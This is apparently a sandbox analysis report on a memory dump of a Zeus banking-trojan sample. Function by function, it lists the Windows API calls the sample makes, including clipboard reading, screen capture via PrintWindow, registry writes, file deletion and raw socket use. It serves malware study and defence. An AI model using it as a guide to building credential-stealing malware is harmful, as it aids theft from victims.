Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00408E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00408E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 00408F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 00408F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 00408F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 00408F7B

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B8E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 003B8E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 003B8F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 003B8F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 003B8F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 003B8F7B

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00419224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 00419245

Part of subcall function 004186EF: GetFileSizeEx.KERNEL32(0041925C,0041925C,?,?,?,0041925C,00000000), ref: 004186FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 00419286
CloseHandle.KERNEL32(?), ref: 00419292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 00419301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00419327

Part of subcall function 0041869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 004186B1

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C9224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 003C9245

Part of subcall function 003C86EF: GetFileSizeEx.KERNEL32(003C925C,003C925C,?,?,?,003C925C,00000000), ref: 003C86FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 003C9286
CloseHandle.KERNEL32(?), ref: 003C9292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 003C9301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 003C9327

Part of subcall function 003C869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 003C86B1

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00419959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

GetDIBits.GDI32(00000000,0040DE4B,00000000,00000001,00000000,00000000,00000000), ref: 00419991
GetDIBits.GDI32(00000000,0040DE4B,00000000,00000001,00000000,00000000,00000000), ref: 004199A7
DeleteObject.GDI32(0040DE4B), ref: 004199B4
CreateDIBSection.GDI32(00000000,00000000,00000000,00422888,?,?), ref: 00419A24

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

DeleteObject.GDI32(0040DE4B), ref: 00419A43

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C9959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

GetDIBits.GDI32(00000000,003BDE4B,00000000,00000001,00000000,00000000,00000000), ref: 003C9991
GetDIBits.GDI32(00000000,003BDE4B,00000000,00000001,00000000,00000000,00000000), ref: 003C99A7
DeleteObject.GDI32(003BDE4B), ref: 003C99B4
CreateDIBSection.GDI32(00000000,00000000,00000000,003D2888,?,?), ref: 003C9A24

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

DeleteObject.GDI32(003BDE4B), ref: 003C9A43

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041A298, Relevance: 7.6, APIs: 5, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 0041A2A6

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

InternetSetStatusCallbackW.WININET(?,0041A24F), ref: 0041A2DB
InternetReadFileExA.WININET ref: 0041A31B
GetLastError.KERNEL32 ref: 0041A325

Part of subcall function 00416B28: TranslateMessage.USER32(?), ref: 00416B4A
Part of subcall function 00416B28: DispatchMessageW.USER32(?), ref: 00416B55
Part of subcall function 00416B28: PeekMessageW.USER32(00000000), ref: 00416B65
Part of subcall function 00416B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00416B79

InternetSetStatusCallbackW.WININET(?,?), ref: 0041A389

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041B3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0041B437
WriteFile.KERNEL32(0041B3D4,?,00000146,?,00000000), ref: 0041B475
WriteFile.KERNEL32(0041B3D4,?,00000000,?,00000000), ref: 0041B499
FlushFileBuffers.KERNEL32(0041B3D4), ref: 0041B4AD
CloseHandle.KERNEL32(0041B3D4), ref: 0041B4B6

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CB3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 003CB437
WriteFile.KERNEL32(003CB3D4,?,00000146,?,00000000), ref: 003CB475
WriteFile.KERNEL32(003CB3D4,?,00000000,?,00000000), ref: 003CB499
FlushFileBuffers.KERNEL32(003CB3D4), ref: 003CB4AD
CloseHandle.KERNEL32(003CB3D4), ref: 003CB4B6

Part of subcall function 003C8716: SetFileAttributesW.KERNEL32(00000080,00000080,003CB4CD,?), ref: 003C871F
Part of subcall function 003C8716: DeleteFileW.KERNEL32(?), ref: 003C8729

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00405DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 00405E1A
IntersectRect.USER32(?,?), ref: 00405E58
IsRectEmpty.USER32(?), ref: 00405E6A
IntersectRect.USER32(?,?), ref: 00405E81

Part of subcall function 00405C8A: GetWindowThreadProcessId.USER32(?,?), ref: 00405CB4
Part of subcall function 00405C8A: ResetEvent.KERNEL32(00000010), ref: 00405D03
Part of subcall function 00405C8A: PostMessageW.USER32(?,?,?,00000010), ref: 00405D26
Part of subcall function 00405C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00405D35
Part of subcall function 00405C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 00405D60
Part of subcall function 00405C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 00405D70
Part of subcall function 00405C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00405D82
Part of subcall function 00405C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00405DA7
Part of subcall function 00405C8A: IntersectRect.USER32(?,?), ref: 00405DC7
Part of subcall function 00405C8A: FillRect.USER32(?,?,00000006), ref: 00405DD9
Part of subcall function 00405C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00405DED

GetTopWindow.USER32(?), ref: 00405EB1

Part of subcall function 00417AC1: GetWindow.USER32(?,00000001), ref: 00417AE3

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B5DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 003B5E1A
IntersectRect.USER32(?,?), ref: 003B5E58
IsRectEmpty.USER32(?), ref: 003B5E6A
IntersectRect.USER32(?,?), ref: 003B5E81

Part of subcall function 003B5C8A: GetWindowThreadProcessId.USER32(?,?), ref: 003B5CB4
Part of subcall function 003B5C8A: ResetEvent.KERNEL32(00000010), ref: 003B5D03
Part of subcall function 003B5C8A: PostMessageW.USER32(?,?,?,00000010), ref: 003B5D26
Part of subcall function 003B5C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 003B5D35
Part of subcall function 003B5C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 003B5D60
Part of subcall function 003B5C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 003B5D70
Part of subcall function 003B5C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 003B5D82
Part of subcall function 003B5C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 003B5DA7
Part of subcall function 003B5C8A: IntersectRect.USER32(?,?), ref: 003B5DC7
Part of subcall function 003B5C8A: FillRect.USER32(?,?,00000006), ref: 003B5DD9
Part of subcall function 003B5C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 003B5DED

GetTopWindow.USER32(?), ref: 003B5EB1

Part of subcall function 003C7AC1: GetWindow.USER32(?,00000001), ref: 003C7AE3

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040BBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 0040BBE0
SetThreadPriority.KERNEL32(00000000), ref: 0040BBE7

Part of subcall function 00412507: CreateMutexW.KERNELBASE(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 00412828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

PathQuoteSpacesW.SHLWAPI(?), ref: 0040BC2A

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

WaitForSingleObject.KERNEL32(000000C8), ref: 0040BC62

Part of subcall function 0041763A: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00419EAB,?,?,00000004), ref: 00417658
Part of subcall function 0041763A: RegSetValueExW.ADVAPI32(00000004,00000004,00000000,?,?,00419EAB,?,?,00419EAB,?,?,00000004,?,00000004), ref: 00417672
Part of subcall function 0041763A: RegCloseKey.ADVAPI32(00000004,?,?,00419EAB,?,?,00000004,?,00000004), ref: 00417681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 0040BC98

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BBBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 003BBBE0
SetThreadPriority.KERNEL32(00000000), ref: 003BBBE7

Part of subcall function 003C2507: CreateMutexW.KERNEL32(003D2C30,00000000,?,?,?,?,?), ref: 003C2528

Part of subcall function 003C2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 003C28A1

PathQuoteSpacesW.SHLWAPI(?), ref: 003BBC2A

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

WaitForSingleObject.KERNEL32(000000C8), ref: 003BBC62

Part of subcall function 003C763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,003C9EAB,?,?,00000004), ref: 003C7658
Part of subcall function 003C763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,003C9EAB,?,?,003C9EAB,?,?,00000004,?,00000004), ref: 003C7672
Part of subcall function 003C763A: RegCloseKey.ADVAPI32(00000004,?,?,003C9EAB,?,?,00000004,?,00000004), ref: 003C7681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 003BBC98

Part of subcall function 003C6B8E: ReleaseMutex.KERNEL32(00000000,003C3021,?,?,?), ref: 003C6B92

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041B062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 0041B06B

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

GlobalLock.KERNEL32(00000000), ref: 0041B09F
EnterCriticalSection.KERNEL32(00423FB4,00000000,00000000), ref: 0041B0DF

Part of subcall function 0041AD5F: EnterCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD7C
Part of subcall function 0041AD5F: LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD9D
Part of subcall function 0041AD5F: EnterCriticalSection.KERNEL32(00423FB4,?,?,?,?,0041B052,?), ref: 0041ADAE
Part of subcall function 0041AD5F: LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AE47

LeaveCriticalSection.KERNEL32(00423FB4,00000000,00404A68), ref: 0041B0F6

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

GlobalUnlock.KERNEL32(?), ref: 0041B109

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CB062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 003CB06B

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

GlobalLock.KERNEL32(00000000), ref: 003CB09F
EnterCriticalSection.KERNEL32(003D3FB4,00000000,00000000), ref: 003CB0DF

Part of subcall function 003CAD5F: EnterCriticalSection.KERNEL32(003D3FB4,?,?,?,003CB052,?), ref: 003CAD7C
Part of subcall function 003CAD5F: LeaveCriticalSection.KERNEL32(003D3FB4,?,?,?,003CB052,?), ref: 003CAD9D
Part of subcall function 003CAD5F: EnterCriticalSection.KERNEL32(003D3FB4,?,?,?,?,003CB052,?), ref: 003CADAE
Part of subcall function 003CAD5F: LeaveCriticalSection.KERNEL32(003D3FB4,?,?,?,003CB052,?), ref: 003CAE47

LeaveCriticalSection.KERNEL32(003D3FB4,00000000,003B4A68), ref: 003CB0F6

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

GlobalUnlock.KERNEL32(?), ref: 003CB109

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004168E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(000000FF,00000002,00000000), ref: 004168F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0041691C
WSAGetLastError.WS2_32 ref: 00416923

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041694F

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

closesocket.WS2_32(?), ref: 00416963

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C68E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(000000FF,00000002,00000000), ref: 003C68F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 003C691C
WSAGetLastError.WS2_32 ref: 003C6923

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003C694F

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

#3.WS2_32(?), ref: 003C6963

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00418A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 00418A5A

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

FindNextFileW.KERNEL32(00000000,?), ref: 00418AB5
FindClose.KERNEL32(00000000), ref: 00418AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00418ACC
RemoveDirectoryW.KERNEL32(?), ref: 00418AD3

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C8A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 003C8A5A

Part of subcall function 003C8716: SetFileAttributesW.KERNEL32(00000080,00000080,003CB4CD,?), ref: 003C871F
Part of subcall function 003C8716: DeleteFileW.KERNEL32(?), ref: 003C8729

FindNextFileW.KERNEL32(00000000,?), ref: 003C8AB5
FindClose.KERNEL32(00000000), ref: 003C8AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 003C8ACC
RemoveDirectoryW.KERNEL32(?), ref: 003C8AD3

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00405A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 00405A88

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

TlsGetValue.KERNEL32 ref: 00405A21
SaveDC.GDI32(?), ref: 00405A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 00405A61
RestoreDC.GDI32(?,00000000), ref: 00405A73

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B5A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 003B5A88

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

TlsGetValue.KERNEL32 ref: 003B5A21
SaveDC.GDI32(?), ref: 003B5A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 003B5A61
RestoreDC.GDI32(?,00000000), ref: 003B5A73

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00405BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,004130F6), ref: 00405C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,004130F6), ref: 00405C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,004130F6), ref: 00405C1C

Part of subcall function 004054A9: GetWindowInfo.USER32(?,?), ref: 00405515
Part of subcall function 004054A9: IntersectRect.USER32(?,?,-00000114), ref: 00405538
Part of subcall function 004054A9: IntersectRect.USER32(?,?,-00000114), ref: 0040558E
Part of subcall function 004054A9: GetDC.USER32(00000000), ref: 004055D2
Part of subcall function 004054A9: CreateCompatibleDC.GDI32(00000000), ref: 004055E3
Part of subcall function 004054A9: ReleaseDC.USER32(00000000,00000000), ref: 004055ED
Part of subcall function 004054A9: SelectObject.GDI32(00000000,?), ref: 00405602
Part of subcall function 004054A9: DeleteDC.GDI32(00000000), ref: 00405610
Part of subcall function 004054A9: TlsSetValue.KERNEL32(?), ref: 0040565B
Part of subcall function 004054A9: EqualRect.USER32(?,?), ref: 00405675
Part of subcall function 004054A9: SaveDC.GDI32(00000000), ref: 00405680
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040569B
Part of subcall function 004054A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 004056BB
Part of subcall function 004054A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 004056CD
Part of subcall function 004054A9: RestoreDC.GDI32(00000000,?), ref: 004056E4
Part of subcall function 004054A9: SaveDC.GDI32(00000000), ref: 00405706
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040571C
Part of subcall function 004054A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00405735
Part of subcall function 004054A9: RestoreDC.GDI32(00000000,?), ref: 00405743
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00405756
Part of subcall function 004054A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00405766
Part of subcall function 004054A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00405778
Part of subcall function 004054A9: TlsSetValue.KERNEL32(00000000), ref: 00405792
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 004057B2
Part of subcall function 004054A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 004057CE
Part of subcall function 004054A9: SelectObject.GDI32(00000000,?), ref: 004057E4
Part of subcall function 004054A9: DeleteDC.GDI32(00000000), ref: 004057EB
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00405813
Part of subcall function 004054A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 00405829

SetEvent.KERNEL32(00422868,?,00000001), ref: 00405C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00405C76

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
